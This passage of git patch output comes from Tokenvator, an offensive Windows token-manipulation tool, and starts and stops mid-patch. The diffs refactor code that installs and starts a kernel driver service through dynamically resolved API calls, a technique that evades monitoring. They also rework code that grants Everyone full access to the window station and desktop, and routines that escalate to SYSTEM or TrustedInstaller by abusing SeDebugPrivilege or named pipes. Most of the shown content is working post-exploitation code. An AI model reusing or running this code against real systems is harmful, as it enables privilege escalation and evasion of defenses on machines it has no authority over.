+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hCreateServiceW = Generic.GetExportAddress(hadvapi32, "CreateServiceW");
+            MonkeyWorks.advapi32.CreateServiceW fCreateServiceW = (MonkeyWorks.advapi32.CreateServiceW)Marshal.GetDelegateForFunctionPointer(hCreateServiceW, typeof(MonkeyWorks.advapi32.CreateServiceW));
+
+            IntPtr hService = IntPtr.Zero;
+            try
+            {
+                hService = fCreateServiceW(
+                    hSCManager,
+                    "ScTokenDriver",
+                    "ScTokenDriver",
+                    Winsvc.dwDesiredAccess.SERVICE_START,
+                    Winsvc.dwServiceType.SERVICE_KERNEL_DRIVER,
+                    Winsvc.dwStartType.SERVICE_DEMAND_START,
+                    Winsvc.dwErrorControl.SERVICE_ERROR_NORMAL,
+                    lpBinaryPathName,
+                    string.Empty, string.Empty, string.Empty, string.Empty, string.Empty
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] CreateServiceW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
             if (IntPtr.Zero == hService)
             {
                 Misc.GetWin32Error("CreateService");
                 return false;
             }
 
-            if (!advapi32.StartService(hService, 0, new string[0]))
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.StartService(hService, 0, new string[0])
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hStartServiceW = Generic.GetExportAddress(hadvapi32, "StartServiceW");
+            MonkeyWorks.advapi32.StartServiceW fStartServiceW = (MonkeyWorks.advapi32.StartServiceW)Marshal.GetDelegateForFunctionPointer(hStartServiceW, typeof(MonkeyWorks.advapi32.StartServiceW));
+
+            bool retVat = false;
+            try
+            {
+                retVat = fStartServiceW(hService, 0, new string[0]);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] StartServiceW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
+            if (!retVat)
             {
                 Misc.GetWin32Error("StartService");
                 return false;
diff --git a/Tokenvator/Plugins/Enumeration/DesktopACL.cs b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
index fa6b5de..0a89977 100644
--- a/Tokenvator/Plugins/Enumeration/DesktopACL.cs
+++ b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
@@ -1,11 +1,9 @@
 using System;
 using System.Runtime.InteropServices;
-using System.Diagnostics;
 
 using MonkeyWorks.Unmanaged.Headers;
 using MonkeyWorks.Unmanaged.Libraries;
 
-
 using Tokenvator.Plugins.AccessTokens;
 using Tokenvator.Resources;
 
@@ -13,340 +11,33 @@ namespace Tokenvator.Plugins.Enumeration
 {
     class DesktopACL : IDisposable
     {
-        #region P/Invokes
-        [Flags]
-        public enum WindowStationSecurity
-        {
-            DELETE = 0x00010000,
-            READ_CONTROL = 0x00020000,
-            SYNCHRONIZE = 0x00100000,
-            WRITE_DAC = 0x00040000,
-            WRITE_OWNER = 0x00080000,
-
-            WINSTA_ALL_ACCESS = 0x37F,
-            WINSTA_ACCESSCLIPBOARD = 0x0004,
-            WINSTA_ACCESSGLOBALATOMS = 0x0020,
-            WINSTA_CREATEDESKTOP = 0x0008,
-            WINSTA_ENUMDESKTOPS = 0x0001,
-            WINSTA_ENUMERATE = 0x0100,
-            WINSTA_EXITWINDOWS = 0x0040,
-            WINSTA_READATTRIBUTES = 0x0002,
-            WINSTA_READSCREEN = 0x0200,
-            WINSTA_WRITEATTRIBUTES = 0x0010,
-
-            ACCESS_SYSTEM_SECURITY = 0x01000000
-        }
-
-        [DllImport("user32.dll", SetLastError = true)]
-        public static extern IntPtr OpenWindowStationW(
-            IntPtr lpszWinSta,
-            bool fInherit,
-            WindowStationSecurity dwDesiredAccess
-        );
-
-        [Flags]
-        public enum _SE_OBJECT_TYPE
-        {
-            SE_UNKNOWN_OBJECT_TYPE,
-            SE_FILE_OBJECT,
-            SE_SERVICE,
-            SE_PRINTER,
-            SE_REGISTRY_KEY,
-            SE_LMSHARE,
-            SE_KERNEL_OBJECT,
-            SE_WINDOW_OBJECT,
-            SE_DS_OBJECT,
-            SE_DS_OBJECT_ALL,
-            SE_PROVIDER_DEFINED_OBJECT,
-            SE_WMIGUID_OBJECT,
-            SE_REGISTRY_WOW64_32KEY,
-            SE_REGISTRY_WOW64_64KEY
-        }
-
-        [Flags]
-        public enum SECURITY_INFORMATION : uint
-        {
-            OWNER_SECURITY_INFORMATION = 0x00000001,
-            GROUP_SECURITY_INFORMATION = 0x00000002,
-            DACL_SECURITY_INFORMATION = 0x00000004,
-            SACL_SECURITY_INFORMATION = 0x00000008,
-            UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000,
-            UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000,
-            PROTECTED_SACL_SECURITY_INFORMATION = 0x40000000,
-            PROTECTED_DACL_SECURITY_INFORMATION = 0x80000000,
-        }
-
-        [DllImport("advapi32.dll", SetLastError = true)]
-        public static extern uint GetSecurityInfo(
-            IntPtr handle,
-            _SE_OBJECT_TYPE ObjectType,
-            SECURITY_INFORMATION SecurityInfo,
-            ref IntPtr ppsidOwner,
-            ref IntPtr ppsidGroup,
-            ref IntPtr ppDacl,
-            ref IntPtr ppSacl,
-            ref IntPtr ppSecurityDescriptor
-        );
-
-        [Flags]
-        public enum WELL_KNOWN_SID_TYPE
-        {
-            WinNullSid,
-            WinWorldSid,
-            WinLocalSid,
-            WinCreatorOwnerSid,
-            WinCreatorGroupSid,
-            WinCreatorOwnerServerSid,
-            WinCreatorGroupServerSid,
-            WinNtAuthoritySid,
-            WinDialupSid,
-            WinNetworkSid,
-            WinBatchSid,
-            WinInteractiveSid,
-            WinServiceSid,
-            WinAnonymousSid,
-            WinProxySid,
-            WinEnterpriseControllersSid,
-            WinSelfSid,
-            WinAuthenticatedUserSid,
-            WinRestrictedCodeSid,
-            WinTerminalServerSid,
-            WinRemoteLogonIdSid,
-            WinLogonIdsSid,
-            WinLocalSystemSid,
-            WinLocalServiceSid,
-            WinNetworkServiceSid,
-            WinBuiltinDomainSid,
-            WinBuiltinAdministratorsSid,
-            WinBuiltinUsersSid,
-            WinBuiltinGuestsSid,
-            WinBuiltinPowerUsersSid,
-            WinBuiltinAccountOperatorsSid,
-            WinBuiltinSystemOperatorsSid,
-            WinBuiltinPrintOperatorsSid,
-            WinBuiltinBackupOperatorsSid,
-            WinBuiltinReplicatorSid,
-            WinBuiltinPreWindows2000CompatibleAccessSid,
-            WinBuiltinRemoteDesktopUsersSid,
-            WinBuiltinNetworkConfigurationOperatorsSid,
-            WinAccountAdministratorSid,
-            WinAccountGuestSid,
-            WinAccountKrbtgtSid,
-            WinAccountDomainAdminsSid,
-            WinAccountDomainUsersSid,
-            WinAccountDomainGuestsSid,
-            WinAccountComputersSid,
-            WinAccountControllersSid,
-            WinAccountCertAdminsSid,
-            WinAccountSchemaAdminsSid,
-            WinAccountEnterpriseAdminsSid,
-            WinAccountPolicyAdminsSid,
-            WinAccountRasAndIasServersSid,
-            WinNTLMAuthenticationSid,
-            WinDigestAuthenticationSid,
-            WinSChannelAuthenticationSid,
-            WinThisOrganizationSid,
-            WinOtherOrganizationSid,
-            WinBuiltinIncomingForestTrustBuildersSid,
-            WinBuiltinPerfMonitoringUsersSid,
-            WinBuiltinPerfLoggingUsersSid,
-            WinBuiltinAuthorizationAccessSid,
-            WinBuiltinTerminalServerLicenseServersSid,
-            WinBuiltinDCOMUsersSid,
-            WinBuiltinIUsersSid,
-            WinIUserSid,
-            WinBuiltinCryptoOperatorsSid,
-            WinUntrustedLabelSid,
-            WinLowLabelSid,
-            WinMediumLabelSid,
-            WinHighLabelSid,
-            WinSystemLabelSid,
-            WinWriteRestrictedCodeSid,
-            WinCreatorOwnerRightsSid,
-            WinCacheablePrincipalsGroupSid,
-            WinNonCacheablePrincipalsGroupSid,
-            WinEnterpriseReadonlyControllersSid,
-            WinAccountReadonlyControllersSid,
-            WinBuiltinEventLogReadersGroup,
-            WinNewEnterpriseReadonlyControllersSid,
-            WinBuiltinCertSvcDComAccessGroup,
-            WinMediumPlusLabelSid,
-            WinLocalLogonSid,
-            WinConsoleLogonSid,
-            WinThisOrganizationCertificateSid,
-            WinApplicationPackageAuthoritySid,
-            WinBuiltinAnyPackageSid,
-            WinCapabilityInternetClientSid,
-            WinCapabilityInternetClientServerSid,
-            WinCapabilityPrivateNetworkClientServerSid,
-            WinCapabilityPicturesLibrarySid,
-            WinCapabilityVideosLibrarySid,
-            WinCapabilityMusicLibrarySid,
-            WinCapabilityDocumentsLibrarySid,
-            WinCapabilitySharedUserCertificatesSid,
-            WinCapabilityEnterpriseAuthenticationSid,
-            WinCapabilityRemovableStorageSid,
-            WinBuiltinRDSRemoteAccessServersSid,
-            WinBuiltinRDSEndpointServersSid,
-            WinBuiltinRDSManagementServersSid,
-            WinUserModeDriversSid,
-            WinBuiltinHyperVAdminsSid,
-            WinAccountCloneableControllersSid,
-            WinBuiltinAccessControlAssistanceOperatorsSid,
-            WinBuiltinRemoteManagementUsersSid,
-            WinAuthenticationAuthorityAssertedSid,
-            WinAuthenticationServiceAssertedSid,
-            WinLocalAccountSid,
-            WinLocalAccountAndAdministratorSid,
-            WinAccountProtectedUsersSid,
-            WinCapabilityAppointmentsSid,
-            WinCapabilityContactsSid,
-            WinAccountDefaultSystemManagedSid,
-            WinBuiltinDefaultSystemManagedGroupSid,
-            WinBuiltinStorageReplicaAdminsSid,
-            WinAccountKeyAdminsSid,
-            WinAccountEnterpriseKeyAdminsSid,
-            WinAuthenticationKeyTrustSid,
-            WinAuthenticationKeyPropertyMFASid,
-            WinAuthenticationKeyPropertyAttestationSid,
-            WinAuthenticationFreshKeyAuthSid,
-            WinBuiltinDeviceOwnersSid
-        }
-
-        [DllImport("advapi32.dll", SetLastError = true)]
-        public static extern bool CreateWellKnownSid(
-            WELL_KNOWN_SID_TYPE WellKnownSidType,
-            IntPtr DomainSid,
-            IntPtr pSid,
-            ref uint cbSid
-        );
-
-        public enum _MULTIPLE_TRUSTEE_OPERATION
-        {
-            NO_MULTIPLE_TRUSTEE,
-            TRUSTEE_IS_IMPERSONATE
-        }
-
-        public enum _TRUSTEE_FORM
-        {
-            TRUSTEE_IS_SID,
-            TRUSTEE_IS_NAME,
-            TRUSTEE_BAD_FORM,
-            TRUSTEE_IS_OBJECTS_AND_SID,
-            TRUSTEE_IS_OBJECTS_AND_NAME
-        }
-
-        public enum _TRUSTEE_TYPE
-        {
-            TRUSTEE_IS_UNKNOWN,
-            TRUSTEE_IS_USER,
-            TRUSTEE_IS_GROUP,
-            TRUSTEE_IS_DOMAIN,
-            TRUSTEE_IS_ALIAS,
-            TRUSTEE_IS_WELL_KNOWN_GROUP,
-            TRUSTEE_IS_DELETED,
-            TRUSTEE_IS_INVALID,
-            TRUSTEE_IS_COMPUTER
-        }
-
-        public struct _TRUSTEE_A
-        {
-            public IntPtr pMultipleTrustee;
-            public _MULTIPLE_TRUSTEE_OPERATION MultipleTrusteeOperation;
-            public _TRUSTEE_FORM TrusteeForm;
-            public _TRUSTEE_TYPE TrusteeType;
-            public IntPtr ptstrName;
-        }
-
-        public enum _ACCESS_MODE
-        {
-            NOT_USED_ACCESS,
-            GRANT_ACCESS,
-            SET_ACCESS,
-            DENY_ACCESS,
-            REVOKE_ACCESS,
-            SET_AUDIT_SUCCESS,
-            SET_AUDIT_FAILURE
-        }
-
-        public struct _EXPLICIT_ACCESS_A
-        {
-            public uint grfAccessPermissions;
-            public _ACCESS_MODE grfAccessMode;
-            public uint grfInheritance;
-            public _TRUSTEE_A Trustee;
-        }
-
-        [DllImport("advapi32.dll", SetLastError = true)]
-        public static extern uint SetEntriesInAclW(
-            uint cCountOfExplicitEntries,
-            ref _EXPLICIT_ACCESS_A pListOfExplicitEntries,
-            IntPtr OldAcl,
-            ref IntPtr NewAcl
-        );
-
-        [DllImport("advapi32.dll", SetLastError = true)]
-        public static extern uint SetSecurityInfo(
-            IntPtr handle,
-            _SE_OBJECT_TYPE ObjectType,
-            SECURITY_INFORMATION SecurityInfo,
-            IntPtr psidOwner,
-            IntPtr psidGroup,
-            IntPtr pDacl,
-            IntPtr pSacl
-        );
-
-        [Flags]
-        public enum DesktopSecurity
-        {
-            DELETE = 0x00010000,
-            READ_CONTROL = 0x00020000,
-            SYNCHRONIZE = 0x00100000,
-            WRITE_DAC = 0x00040000,
-            WRITE_OWNER = 0x00080000,
-
-            DESKTOP_CREATEMENU = 0x0004,
-            DESKTOP_CREATEWINDOW = 0x0002,
-            DESKTOP_ENUMERATE = 0x0040,
-            DESKTOP_HOOKCONTROL = 0x0008,
-            DESKTOP_JOURNALPLAYBACK = 0x0020,
-            DESKTOP_JOURNALRECORD = 0x0010,
-            DESKTOP_READOBJECTS = 0x0001,
-            DESKTOP_SWITCHDESKTOP = 0x0100,
-            DESKTOP_WRITEOBJECTS = 0x0080,
-
-            GENERIC_ALL = 0x000F01FF,
-        }
-
-        [DllImport("User32.dll", SetLastError = true)]
-        public static extern IntPtr OpenDesktopA(
-            string lpszDesktop,
-            uint dwFlags,
-            bool fInherit,
-            DesktopSecurity dwDesiredAccess
-        );
-
         private const uint SECURITY_MAX_SID_SIZE = 68;
 
         private IntPtr ptrWinSta0 = IntPtr.Zero;
         private IntPtr pSid = IntPtr.Zero;
         private IntPtr ppSecurityDescriptor = IntPtr.Zero;
-        #endregion
 
+        /// <summary>
+        /// 
+        /// </summary>
         internal DesktopACL()
         {
             Console.WriteLine("[*] Updating Desktop DACL");
             ptrWinSta0 = Marshal.StringToHGlobalUni("WinSta0");
         }
 
-        //SeSecurityPrivilege
+
+        /// <summary>
+        /// 
+        /// </summary>
         internal void OpenWindow()
         {
-            IntPtr hWinStation = OpenWindowStationW(
-                ptrWinSta0, false,
-                WindowStationSecurity.ACCESS_SYSTEM_SECURITY
-                | WindowStationSecurity.READ_CONTROL
-                | WindowStationSecurity.WRITE_DAC
+            IntPtr hWinStation = user32.OpenWindowStationW(
+                "WinSta0", 
+                false,
+                Winuser.WindowStationSecurity.ACCESS_SYSTEM_SECURITY
+                | Winuser.WindowStationSecurity.READ_CONTROL
+                | Winuser.WindowStationSecurity.WRITE_DAC
             );
 
             if (IntPtr.Zero == hWinStation)
@@ -359,9 +50,15 @@ internal void OpenWindow()
             _SetDACL(hWinStation);
         }
 
+        /// <summary>
+        /// 
+        /// </summary>
         internal void OpenDesktop()
         {
-            IntPtr hDesktop = OpenDesktopA("default", 0, false, DesktopSecurity.GENERIC_ALL | DesktopSecurity.WRITE_DAC);
+            IntPtr hDesktop = user32.OpenDesktopA(
+                "default", 0, false, 
+                Winuser.DesktopSecurity.GENERIC_ALL 
+                | Winuser.DesktopSecurity.WRITE_DAC);
 
             if (IntPtr.Zero == hDesktop)
             {
@@ -373,15 +70,19 @@ internal void OpenDesktop()
             _SetDACL(hDesktop);
         }
 
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <param name="handle"></param>
         private void _SetDACL(IntPtr handle)
         { 
             ////////////////////////////////////////////////////////////////////////////////
             IntPtr ppsidOwner, ppsidGroup, ppDacl, ppSacl;
             ppsidOwner = ppsidGroup = ppDacl = ppSacl = IntPtr.Zero;
-            uint status = GetSecurityInfo(
+            uint status = advapi32.GetSecurityInfo(
                 handle,
-                _SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
-                SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
+                Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
+                Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
                 ref ppsidOwner, ref ppsidGroup, ref ppDacl, ref ppSacl, ref ppSecurityDescriptor
             );
 
@@ -399,7 +100,7 @@ private void _SetDACL(IntPtr handle)
 
             ////////////////////////////////////////////////////////////////////////////////
             uint size = 0;
-            CreateWellKnownSid(WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, IntPtr.Zero, ref size);
+            advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, IntPtr.Zero, ref size);
             if (0 == size)
             {
                 Misc.GetWin32Error("CreateWellKnownSid - Pass 1");
@@ -408,7 +109,7 @@ private void _SetDACL(IntPtr handle)
             Console.WriteLine(" [+] Create Everyone Sid - Pass 1 : 0x{0}", size.ToString("X4"));
             pSid = Marshal.AllocHGlobal((int)size);
 
-            if (!CreateWellKnownSid(WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, pSid, ref size))
+            if (!advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, pSid, ref size))
             {
                 Misc.GetWin32Error("CreateWellKnownSid - Pass 2");
                 return;
@@ -416,25 +117,25 @@ private void _SetDACL(IntPtr handle)
             Console.WriteLine(" [+] Create Everyone Sid - Pass 2 : 0x{0}", pSid.ToString("X4"));
 
             ////////////////////////////////////////////////////////////////////////////////
-            _TRUSTEE_A trustee = new _TRUSTEE_A
+            Accctrl._TRUSTEE_W trustee = new Accctrl._TRUSTEE_W
             {
                 pMultipleTrustee = IntPtr.Zero,
-                MultipleTrusteeOperation = _MULTIPLE_TRUSTEE_OPERATION.NO_MULTIPLE_TRUSTEE,
-                TrusteeForm = _TRUSTEE_FORM.TRUSTEE_IS_SID,
-                TrusteeType = _TRUSTEE_TYPE.TRUSTEE_IS_WELL_KNOWN_GROUP,
+                MultipleTrusteeOperation = Accctrl._MULTIPLE_TRUSTEE_OPERATION.NO_MULTIPLE_TRUSTEE,
+                TrusteeForm = Accctrl._TRUSTEE_FORM.TRUSTEE_IS_SID,
+                TrusteeType = Accctrl._TRUSTEE_TYPE.TRUSTEE_IS_WELL_KNOWN_GROUP,
                 ptstrName = pSid
             };
 
-            _EXPLICIT_ACCESS_A explicitAccess = new _EXPLICIT_ACCESS_A
+            Accctrl._EXPLICIT_ACCESS_W explicitAccess = new Accctrl._EXPLICIT_ACCESS_W
             {
-                grfAccessPermissions = 0xf03ff,
-                grfAccessMode = _ACCESS_MODE.GRANT_ACCESS,
-                grfInheritance = 1,
+                grfAccessPermissions = Winuser.WindowStationSecurity.WINSTA_ALL_ACCESS, //0xf03ff,
+                grfAccessMode = Accctrl._ACCESS_MODE.GRANT_ACCESS,
+                grfInheritance = Accctrl.Inheritance.SUB_OBJECTS_ONLY_INHERIT, //1,
                 Trustee = trustee
             };
 
             IntPtr newAcl = new IntPtr();
-            status = SetEntriesInAclW(1, ref explicitAccess, ppDacl, ref newAcl);
+            status = advapi32.SetEntriesInAclW(1, ref explicitAccess, ppDacl, ref newAcl);
 
             if (0 != status)
             {
@@ -449,10 +150,10 @@ private void _SetDACL(IntPtr handle)
             Console.WriteLine(" [+] Added Everyone to DACL : 0x{0}", newAcl.ToString("X4"));
 
             ////////////////////////////////////////////////////////////////////////////////
-            status = SetSecurityInfo(
+            status = advapi32.SetSecurityInfo(
                 handle,
-                _SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
-                SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
+                Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
+                Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
                 ppsidOwner, ppsidGroup, newAcl, ppSacl
             );
 
@@ -464,6 +165,10 @@ private void _SetDACL(IntPtr handle)
             Console.WriteLine(" [+] Applied DACL to Object");
         }
 
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <param name="hToken"></param>
         internal void UpdateSecurityDacl(IntPtr hToken)
         {
             TokenInformation tokenInformation = new TokenInformation(hToken);
@@ -504,12 +209,12 @@ internal void UpdateSecurityDacl(IntPtr hToken)
                 return;
             }
 
-            Accctrl.TRUSTEE_W trustee = new Accctrl.TRUSTEE_W()
+            Accctrl._TRUSTEE_W trustee = new Accctrl._TRUSTEE_W()
             {
                 pMultipleTrustee = IntPtr.Zero,
-                MultipleTrusteeOperation = Accctrl.MULTIPLE_TRUSTEE_OPERATION.NO_MULTIPLE_TRUSTEE,
-                TrusteeForm = Accctrl.TRUSTEE_FORM.TRUSTEE_IS_SID,
-                TrusteeType = Accctrl.TRUSTEE_TYPE.TRUSTEE_IS_USER,
+                MultipleTrusteeOperation = Accctrl._MULTIPLE_TRUSTEE_OPERATION.NO_MULTIPLE_TRUSTEE,
+                TrusteeForm = Accctrl._TRUSTEE_FORM.TRUSTEE_IS_SID,
+                TrusteeType = Accctrl._TRUSTEE_TYPE.TRUSTEE_IS_USER,
                 ptstrName = tokenInformation.tokenUser.User.Sid
             };
 
@@ -522,7 +227,7 @@ internal void UpdateSecurityDacl(IntPtr hToken)
             };
 
             Winnt._ACL newACL = new Winnt._ACL();
-            uint retVal = advapi32.SetEntriesInAclW(1, ref explicitAccess, oldACL, ref newACL);
+            uint retVal = advapi32.SetEntriesInAclW(1, ref explicitAccess, ref oldACL, ref newACL);
             if (0 != retVal)
             {
                 Misc.GetWin32Error("SetEntriesInAclW");
@@ -552,6 +257,9 @@ internal void UpdateSecurityDacl(IntPtr hToken)
 
         }
 
+        /// <summary>
+        /// 
+        /// </summary>
         public void Dispose()
         {
             if (IntPtr.Zero != ptrWinSta0)
@@ -564,6 +272,9 @@ public void Dispose()
                 kernel32.LocalFree(ppSecurityDescriptor);
         }
 
+        /// <summary>
+        /// 
+        /// </summary>
         ~DesktopACL()
         {
             Dispose();
diff --git a/Tokenvator/Resources/Misc.cs b/Tokenvator/Resources/Misc.cs
index a6edfed..7233307 100644
--- a/Tokenvator/Resources/Misc.cs
+++ b/Tokenvator/Resources/Misc.cs
@@ -76,7 +76,6 @@ public static void GetNetApiError(string location, uint netError)
             {
                 Console.WriteLine(" [-] Function {0} failed: ", location);
                 Console.WriteLine(" [-] {0}", (MonkeyWorks.Unmanaged.Libraries.DInvoke.netapi32.NET_API_STATUS)netError);
-
             }
         }
 
diff --git a/Tokenvator/Tokenvator.csproj b/Tokenvator/Tokenvator.csproj
index 2c24704..f49937f 100644
--- a/Tokenvator/Tokenvator.csproj
+++ b/Tokenvator/Tokenvator.csproj
@@ -2,8 +2,8 @@
 <Project ToolsVersion="15.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup>
     <Configuration Condition=" '$(Configuration)' == '' ">
-		<legacyCorruptedStateExceptionsPolicy enabled="true"/>  
-	</Configuration>
+      <legacyCorruptedStateExceptionsPolicy enabled="true" />
+    </Configuration>
     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
     <ProductVersion>9.0.30729</ProductVersion>
     <SchemaVersion>2.0</SchemaVersion>
@@ -188,7 +188,6 @@
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\Winuser.cs" />
     <Compile Include="Resources\MonkeyWorks\MonkeyWorks\Unmanaged\Headers\wudfwdm.cs" />
     <Compile Include="Plugins\Execution\PSExec.cs" />
-    <Compile Include="Plugins\AccessTokens\RestrictedToken.cs" />
     <Compile Include="Plugins\Execution\Services.cs" />
     <Compile Include="Plugins\AccessTokens\TokenDriver.cs" />
     <Compile Include="Plugins\AccessTokens\TokenManipulation.cs" />

From 04e7b5e7a32e95cdc572431adcfbc50003da32d6 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 2 Sep 2021 22:32:55 -0500
Subject: [PATCH 16/36] Moved Logon_User to CreateTokens + CheckTokenPrivilege
 rework

---
 Tokenvator/MainLoop.Modules.cs                |  87 +++---
 Tokenvator/MainLoop.cs                        |   2 +-
 .../Plugins/AccessTokens/CreateTokens.cs      | 283 +++++++++++++++---
 .../Plugins/AccessTokens/TokenInformation.cs  |  27 +-
 .../Plugins/AccessTokens/TokenManipulation.cs | 246 +--------------
 Tokenvator/Plugins/Enumeration/DesktopACL.cs  |  59 +++-
 6 files changed, 347 insertions(+), 357 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 223ebd8..ffec114 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -141,9 +141,9 @@ private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
         ////////////////////////////////////////////////////////////////////////////////
         //
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _ClearDesktopACL()
+        private static void _ClearDesktopACL(IntPtr hToken)
         {
-            using (DesktopACL dA = new DesktopACL())
+            using (DesktopACL dA = new DesktopACL(hToken))
             {
                 dA.OpenWindow();
                 dA.OpenDesktop();
@@ -251,42 +251,29 @@ private static void _FindUserProcessesWMI(CommandLineParsing cLP)
         ////////////////////////////////////////////////////////////////////////////////
         private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
         {
-            bool exists, enabled;
             using (TokenInformation ti = new TokenInformation(hToken))
             {
                 ti.SetWorkingTokenToSelf();
-                if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME, out exists, out enabled))
+                if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME))
                 {
-                    Console.WriteLine("[-] Check Token Privilege Failed");
-                    return;
+                    if (string.IsNullOrEmpty(cLP.Command))
+                        NamedPipes.GetSystem();
+                    else
+                        NamedPipes.GetSystem(cLP.Command, cLP.Arguments);
                 }
-            }
-
-            if (exists)
-            {
-                using (TokenManipulation t = new TokenManipulation(hToken))
+                else
                 {
-                    t.SetWorkingTokenToSelf();
-
-                    if (!enabled)
+                    using (TokenManipulation t = new TokenManipulation(hToken))
                     {
-                        t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
-                    }
+                        t.SetWorkingTokenToSelf();
 
-                    
-                    if (string.IsNullOrEmpty(cLP.Command))
-                        t.GetSystem();
-                    else
-                        t.GetSystem(cLP.CommandAndArgs);
+                        if (string.IsNullOrEmpty(cLP.Command))
+                            t.GetSystem();
+                        else
+                            t.GetSystem(cLP.CommandAndArgs);
+                    }
                 }
             }
-            else
-            {
-                if (string.IsNullOrEmpty(cLP.Command))
-                    NamedPipes.GetSystem();
-                else
-                    NamedPipes.GetSystem(cLP.Command, cLP.Arguments);
-            }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -317,9 +304,9 @@ private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
         ////////////////////////////////////////////////////////////////////////////////
         private static void _GetTrustedInstallerLogon(CommandLineParsing cLP, IntPtr hToken)
         {
-            using (TokenManipulation t = new TokenManipulation(hToken))
+            using (CreateTokens ct = new CreateTokens(hToken))
             {
-                t.LogonUser(
+                ct.LogonUser(
                     "NT AUTHORITY", 
                     "SYSTEM", 
                     string.Empty, 
@@ -340,31 +327,25 @@ private static void _GetTrustedInstallerLogon(CommandLineParsing cLP, IntPtr hTo
         ////////////////////////////////////////////////////////////////////////////////
         private static void _GetTrustedInstallerService(CommandLineParsing cLP, IntPtr hToken)
         {
-            bool exists, enabled;
             using (TokenInformation ti = new TokenInformation(hToken))
             {
                 ti.SetWorkingTokenToSelf();
-                ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME, out exists, out enabled);
-            }
-
-            if (exists)
-            {
-                using (TokenManipulation t = new TokenManipulation(hToken))
+                if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME))
                 {
-                    t.SetWorkingTokenToSelf();
-
-                    if (!enabled)
-                        t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
-
-                    if (string.IsNullOrEmpty(cLP.Command))
-                        t.GetTrustedInstaller();
-                    else
-                        t.GetTrustedInstaller(cLP.CommandAndArgs);
+                    Console.WriteLine("[-] Unable to proceed");
+                    return;
+                }
+                else
+                {
+                    using (TokenManipulation tm = new TokenManipulation(hToken))
+                    {
+                        tm.SetWorkingTokenToSelf();
+                        if (string.IsNullOrEmpty(cLP.Command))
+                            tm.GetTrustedInstaller();
+                        else
+                            tm.GetTrustedInstaller(cLP.CommandAndArgs);
+                    }
                 }
-            }
-            else
-            {
-                Console.WriteLine("[-] SeDebugPrivilege Is Not Assigned to Token");
             }
         }
 
@@ -688,16 +669,16 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
                 }
             }
 
-            using (TokenManipulation t = new TokenManipulation(hToken))
+            using (CreateTokens ct = new CreateTokens(hToken))
             {
                 string groups;
                 if (cLP.GetData("groups", out groups))
                 {
-                    t.LogonUser(domain, username, password, groups, logonType, cLP.Command, cLP.Arguments);
+                    ct.LogonUser(domain, username, password, groups, logonType, cLP.Command, cLP.Arguments);
                 }
                 else
                 {
-                    t.LogonUser(domain, username, password, logonType, cLP.Command, cLP.Arguments);
+                    ct.LogonUser(domain, username, password, logonType, cLP.Command, cLP.Arguments);
                 }
             }
         }
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index ac7ff9b..b13029c 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -165,7 +165,7 @@ internal void Run()
                         break;
                         */
                     case "clear_desktop_acl":
-                        _ClearDesktopACL();
+                        _ClearDesktopACL(hToken);
                         break;
                     case "clone_token":
                         _CloneToken(cLP, hToken);
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 8a6b554..1190524 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -12,6 +12,8 @@
 using Tokenvator.Plugins.Enumeration;
 
 using MonkeyWorks.Unmanaged.Headers;
+using System.Diagnostics;
+using Tokenvator.Plugins.Execution;
 
